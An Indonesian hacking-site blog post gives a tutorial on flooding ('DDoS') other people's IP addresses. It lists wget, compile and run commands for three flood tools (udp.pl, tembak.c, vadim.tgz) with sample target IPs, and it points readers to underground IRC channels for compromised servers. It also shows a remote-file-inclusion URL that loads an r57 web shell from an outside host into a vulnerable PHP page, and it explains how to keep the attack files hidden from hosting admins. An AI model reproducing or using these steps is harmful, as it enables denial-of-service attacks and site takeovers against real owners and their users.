VIRGINITY

__.::OUR-ADVERTISER::.__

  


Site menu

Our poll
Rate my site
Total of answers: 13
Section categories
BOOTER [5]
CHAT CLIENT [3]
HACKING & CRACKING [6]
TOSS ID & TOOLS [3]
TIPS & TRIK [2]
GAMES [1]
GLOBAL TOOLS [1]
Kumpulan tools secara umum!
BERITA & PENDIDIKAN [1]
Entries archive
TOP Post
INFO NEWS
INFO FORUM
INFO KOMENTAR
INFO USER
INFO BLOG
INFO IKLAN
INFO MULTIMEDIA
Informasi Web
Main » 2009 » July » 13 » Susah di BooT Coba aja begini..... he..he<^__^>
Susah di BooT Coba aja begini..... he..he<^__^>
10:39 PM
Berikut ini tutorial cara nembak ip orang atau istilah kerenya ddos ada beberapa tools yg sering digunakan untuk menembak ip orang….saya harap tutorial ini jangan pernah anda praktekkan kecuali lagi terpaksa atau anda di dzolimi orang.... wkkwkwkkwkkw <^__^>

syarat pertama ada harus punya shell yang banyak biar manteb tu ddos nya jangan tanggung2 ( ( (100 shell aja cukup.... siy!!)

Ada 3 cara yang saya tau, sebenernya banyak jalan menuju roma artist
mari kita mencobanya !!

Cara 1.>> udp.pl

1. wget http://www.hostinggratis.com/filekamu/udp.txt
mv udp.txt .udp.pl
chmod 755 .udp.pl
2. perl .udp.pl (ip) (port) (timer)
contoh :

perl udp.txt 212.111.11.11 80 99999999999999999999

Cara 2.>> Tembak.c

1. wget http://www.hostinggratis.com/filekamu/tembak.c
2. gcc -o tembak tembak.c
3. ./tembak (ip) (port)
contoh :

./tembak 212.111.11.11 80

Cara 3.>> VADIM

wget http://www.hostingangratis.com/filekamu/vadim.tgz

tar zxvf vadim.TGZ

cd flood

./vadimII [IP.target] [PORT] 10 0

contoh :

./vadimII 212.111.11.11 80

biasanya cara kedua lebih manjur,

dwarf Sekedar tambahan ya,,,, buat yang kesulitan nyari shells
kamu scan sendiri di channel² underground mirc. cara nya buka program mirc ketik /server irc.allindoserv.net 6667 atau /server irc.mildnet.org 6667 kemudian ketik /join #scanner btw, masi banyak lagi server dan channel lain kamu cari sendiri aja ya...... book

Saya akan jelasin dengan cara kedua aja ya,, kayak nya masih banyak yang bingung ya,,???

Alat2 perang yang dibutuhkan:
=> hosting gratis seperti geocities atau zoomshare aja atau semacamnya lah. Kalo ripway saya sarankan jangan, tar kalo admin nya tau file kita di hapus. Yang belom punya silakan daftar dulu, gak usah tergesa² hehehe
=> r57.txt
=> tembak.c
=> udp.txt
=> vadim.tgz
Simpan semua file di atas ke hostingan gratis kamu, jika udah di save, lalu rename/edit sesuai dengan yang saya ketik di atas. OK..... sampe di sini mudah2an ngerti gossip
- baru kemudian kita masuk ke shells,
nah sekarang coba buka browsingan anda kemudian copy shells yang anda dapet tadi,,,, kalo
udah?? kemudian taruh r57 kamu di belakang url shells tadi terakhir ketik tanda tanya ? jadi nya seperti ini http://roadone.net//board/include/bbs.lib.inc.php?site_path=http://www.hostinggratis.com/filekamu/r57.txt?

Mudah2an pusing jd gak di ikutin deh langkah2nya..... booze
cara nembak IP orang lumayan ribet klo lom pernah nyoba tapi antisipasinya cukup mudah koq ???

Mudah2an manfaat biggrin admin

Category: TIPS & TRIK | Views: 675 | Added by: virgin | Rating: 0.0/0 |
Only registered users can add comments.
[ Registration | Login ]
Search
Login form
Login:
Password:
Calendar
«  July 2009  »
SuMoTuWeThFrSa
   1234
567891011
12131415161718
19202122232425
262728293031
STAFF VIRGINITY
STAFF Virginity
__xXx__

Status YM
Status YM

STAFF Virginity
Punisherlady

Status YM
STAFF Virginity
_chinese_boy_

Status YM



STAFF Virginity
bocef

Status YM

MEMBER AKTIF
Biodata
Counter
Site Sponsor












Copyright MyCorp © 2017